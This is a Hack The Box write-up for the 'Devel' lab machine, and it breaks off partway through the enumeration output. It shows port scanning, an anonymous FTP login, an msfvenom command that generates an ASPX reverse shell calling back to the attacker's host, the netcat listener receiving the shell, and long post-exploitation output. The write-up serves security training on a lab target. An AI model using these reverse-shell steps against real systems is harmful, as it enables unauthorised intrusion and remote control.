Hack The Box - Devel
September 11, 2019•11,937 words
Box Details
| OS | DIFFICULTY | POINTS |
|---|---|---|
| Windows | EASY | 20 |
ENUMERATION
Inital Port Scanning
masscan
COMMAND
masscan -p1-65535,U:1-65535 10.10.10.5 --rate=1000 -e tun0 -oG masscan-Blue
RESULT
# Masscan 1.0.5 scan initiated Tue Sep 10 14:08:54 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.5 () Ports: 80/open/tcp////
Host: 10.10.10.5 () Ports: 21/open/tcp////
# Masscan done at Tue Sep 10 14:12:36 2019
nmap
Ports for nmap scanning:
- 80
- 21
COMMAND
nmap -sC -sV -p80,21 -oA nmap-Devel 10.10.10.5
RESULT
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 15:13 BST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
Discovery
FTP
COMMAND
ftp 10.10.10..5
RESULT
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp>
EXPLOITS
Exploit Search
COMMAND
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=8515 -f aspx > revshell.aspx
NOTE: As we are going to use netcat to listen for the reverse shell we must use the the payload windows/shell_reverse_tcp and not windows/shell/reverse_tcp; i.e. a stageless version.
RESULT
# nc -lvvp 8515
listening on [any] 8515 ...
10.10.10.5: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.5] 49166
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
POST EXPLOIT DISCOVERY
System Information
c:\windows\system32\inetsrv>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 13/9/2019, 5:50:51
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 804 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.542 MB
Virtual Memory: In Use: 505 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
Hostname
c:\windows\system32\inetsrv>hostname
hostname
devel
Users
c:\windows\system32\inetsrv>echo %username%
echo %username%
DEVEL$
c:\windows\system32\inetsrv>net users
net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator babis Guest
The command completed with one or more errors.
Network Information
c:\windows\system32\inetsrv>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : devel
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-C8-4B
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
DNS Servers . . . . . . . . . . . : 10.10.10.2
8.8.8.8
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{024DBC4C-1BA9-4DFC-8341-2C35AB1DF869}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
c:\windows\system32\inetsrv>route print
route print
===========================================================================
Interface List
11...00 50 56 b9 c8 4b ......Intel(R) PRO/1000 MT Network Connection
1...........................Software Loopback Interface 1
12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
13...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.10.10.2 10.10.10.5 266
10.10.10.0 255.255.255.0 On-link 10.10.10.5 266
10.10.10.5 255.255.255.255 On-link 10.10.10.5 266
10.10.10.255 255.255.255.255 On-link 10.10.10.5 266
127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 10.10.10.5 266
255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
255.255.255.255 255.255.255.255 On-link 10.10.10.5 266
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 10.10.10.2 Default
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 306 ::1/128 On-link
1 306 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
c:\windows\system32\inetsrv>arp -A
arp -A
Interface: 10.10.10.5 --- 0xb
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-c8-cd dynamic
10.10.10.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
c:\windows\system32\inetsrv>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 1424
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 384
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 724
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 888
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 488
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 496
TCP 10.10.10.5:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.5:49166 10.10.14.10:8515 ESTABLISHED 3228
TCP [::]:21 [::]:0 LISTENING 1424
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 672
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5357 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 384
TCP [::]:49153 [::]:0 LISTENING 724
TCP [::]:49154 [::]:0 LISTENING 888
TCP [::]:49155 [::]:0 LISTENING 488
TCP [::]:49156 [::]:0 LISTENING 496
UDP 0.0.0.0:123 *:* 1000
UDP 0.0.0.0:3702 *:* 1392
UDP 0.0.0.0:3702 *:* 1392
UDP 0.0.0.0:5355 *:* 1072
UDP 0.0.0.0:52626 *:* 1392
UDP 10.10.10.5:137 *:* 4
UDP 10.10.10.5:138 *:* 4
UDP [::]:123 *:* 1000
UDP [::]:3702 *:* 1392
UDP [::]:3702 *:* 1392
UDP [::]:52627 *:* 1392
c:\windows\system32\inetsrv>netsh firewall show state
netsh firewall show state
Firewall status:
-------------------------------------------------------------------
Profile = Standard
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Group policy version = Windows Firewall
Remote admin mode = Disable
Ports currently open on all network interfaces:
Port Protocol Version Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
c:\windows\system32\inetsrv> netsh firewall show config
netsh firewall show config
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Domain profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Service configuration for Standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No Network Discovery
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Log configuration:
-------------------------------------------------------------------
File location = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
Investigate Running Services
c:\windows\system32\inetsrv>schtasks /query /fo LIST /v
schtasks /query /fo LIST /v
Folder: \
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
HostName: DEVEL
TaskName: \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Everyone
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 3:00:00
Start Date: 9/11/2006
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Everyone
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual)
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Updates the AD RMS rights policy templates for the user. This job provides a credential prompt if authentication to the template distribution web service on the server fails.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Everyone
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Autochk
HostName: DEVEL
TaskName: \Microsoft\Windows\Autochk\Proxy
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:21:07
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
Start In: N/A
Comment: This task collects and uploads autochk SQM data if opted-in to the Microsoft Customer Experience Improvement Program.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 525600 minutes
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Customer Experience Improvement Program
HostName: DEVEL
TaskName: \Microsoft\Windows\Customer Experience Improvement Program\Consolidator
Next Run Time: 14/9/2019 8:00:00
Status: Could not start
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 2:00:00
Last Result: -2147479295
Author: Microsoft Corporation
Task To Run: %SystemRoot%\System32\wsqmcons.exe
Start In: N/A
Comment: If the user has consented to participate in the Windows Customer Experience Improvement Program, this job collects and sends usage data to Microsoft.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Hourly
Start Time: 12:00:00
Start Date: 2/1/2004
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 19 Hour(s), 0 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask
Next Run Time: 19/9/2019 3:30:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: The Kernel CEIP (Customer Experience Improvement Program) task collects additional information about the system and sends this data to Microsoft. If the user has not consented to participate in Windows CEIP, this task does nothing.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 3 minutes, If Not Idle Retry For 1020 minutes
Power Management: No Start On Batteries
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 3:30:00
Start Date: 1/9/2008
End Date: N/A
Days: THU
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip
Next Run Time: 16/9/2019 1:30:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 5:57:06
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: The USB CEIP (Customer Experience Improvement Program) task collects Universal Serial Bus related statistics and information about your machine and sends it to the Windows Device Connectivity engineering group at Microsoft. The information received is
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 1:30:00
Start Date: 25/4/2008
End Date: N/A
Days: Every 3 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Defrag
HostName: DEVEL
TaskName: \Microsoft\Windows\Defrag\ScheduledDefrag
Next Run Time: 18/9/2019 1:38:42
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\defrag.exe -c
Start In: N/A
Comment: This task defragments the computers hard disk drives.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 3 minutes, If Not Idle Retry For 10080 minutes Stop the task if Idle State end
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2005
End Date: N/A
Days: WED
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Diagnosis
HostName: DEVEL
TaskName: \Microsoft\Windows\Diagnosis\Scheduled
Next Run Time: 15/9/2019 1:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 17/3/2017 5:45:40
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: The Windows Scheduled Maintenance Task performs periodic maintenance of the computer system by fixing problems automatically or reporting them through the Action Center.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 480 minutes
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: INTERACTIVE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2004
End Date: N/A
Days: SUN
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\DiskDiagnostic
HostName: DEVEL
TaskName: \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector
Next Run Time: 22/9/2019 1:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 5:57:06
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Start In: N/A
Comment: The Windows Disk Diagnostic reports general disk and system information to Microsoft for users participating in the Customer Experience Program.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for minutes, If Not Idle Retry For minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2004
End Date: N/A
Days: SUN
Months: Every 2 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: %windir%\system32\DFDWiz.exe
Start In: N/A
Comment: The Microsoft-Windows-DiskDiagnosticResolver warns users about faults reported by hard disks that support the Self Monitoring and Reporting Technology (S.M.A.R.T.) standard. This task is triggered automatically by the Diagnostic Policy Service when a S.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Location
HostName: DEVEL
TaskName: \Microsoft\Windows\Location\Notifications
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %windir%\System32\LocationNotifications.exe
Start In: N/A
Comment: Location Activity
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Maintenance
HostName: DEVEL
TaskName: \Microsoft\Windows\Maintenance\WinSAT
Next Run Time: 15/9/2019 1:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 17/3/2017 11:49:04
Last Result: 0
Author: Microsoft
Task To Run: COM handler
Start In: N/A
Comment: Measures a system's performance and capabilities
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for minutes, If Not Idle Retry For minutes Stop the task if Idle State end
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrators
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2008
End Date: N/A
Days: SUN
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Media Center
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ActivateWindowsSearch
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoActivateWindowsSearch
Start In: N/A
Comment: Privileged Media Center Search Reindexing job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ConfigureInternetTimeService
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService
Start In: N/A
Comment: Privileged Media Center Time Update Service setting job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\DispatchRecoveryTasks
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0)
Start In: N/A
Comment: Privileged Media Center Recovery Task Dispatcher job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ehDRMInit
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DRMInit
Start In: N/A
Comment: Privileged Media Center DRM initialization job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\InstallPlayReady
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0)
Start In: N/A
Comment: Privileged Media Center PlayReady install job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\mcupdate
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\mcupdate $(Arg0)
Start In: N/A
Comment: Check for Media Center updates.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: NETWORK SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\MediaCenterRecoveryTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform Media Center Recovery activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: Multiple actions
Start In: Multiple actions
Comment: Perform Object Store Recovery activities
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
